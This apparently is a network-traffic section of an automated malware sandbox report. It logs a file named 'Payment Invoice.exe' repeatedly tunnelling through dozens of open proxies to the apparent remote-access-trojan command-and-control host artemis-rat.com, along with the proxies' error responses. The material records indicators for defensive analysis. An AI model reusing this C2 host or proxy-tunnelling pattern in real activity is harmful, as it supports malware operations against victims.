                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.362835884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:51.869122982 CET719INHTTP/1.1 502 Bad Gateway
                                                                Server: ZZY_WEB/20.08.18
                                                                Date: Mon, 11 Mar 2024 15:38:25 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 563
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 5a 5a 59 5f 57 45 42 2f 32 30 2e 30 38 2e 31 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                891192.168.2.452675104.23.126.8807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.268467903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.426037073 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                892192.168.2.452112115.96.208.12480807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.269992113 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:18.670690060 CET72INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                893192.168.2.45263661.92.189.15807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.273518085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                894192.168.2.452249162.214.121.1189897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.273849964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.362883091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.386920929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.386631012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.439645052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                895192.168.2.45262047.242.15.120156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.295665026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                896192.168.2.45070637.187.77.58379207076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.296226978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.776844978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.183556080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                897192.168.2.452700104.21.218.103807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.306050062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.460390091 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                898192.168.2.452637193.239.58.9280817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.307338953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                899192.168.2.452640185.49.30.580817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.316698074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                900192.168.2.45264947.242.234.237807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.323019028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                901192.168.2.452107185.132.242.21280837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.323041916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                902192.168.2.452253189.240.60.17190907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.326837063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.622133017 CET72INHTTP/1.1 200 Connection established
                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                903192.168.2.451020199.229.254.12941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.333118916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                904192.168.2.450698187.122.105.18141537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.338375092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                905192.168.2.452733104.20.178.166807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.347729921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.504762888 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                906192.168.2.45264647.103.112.8688997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.348683119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.678468943 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                907192.168.2.452641185.82.218.5210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.348777056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                908192.168.2.450772143.137.116.7210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.351917028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                909192.168.2.452650192.162.232.1510807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.354278088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                910192.168.2.452657148.72.209.174390277076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.378570080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.182990074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.278995037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.385541916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.589495897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.792563915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.089716911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.334036112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:59.979837894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                911192.168.2.45211561.133.66.6990027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.380223036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.020261049 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                912192.168.2.45271767.43.236.2052397076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.385737896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.564152002 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
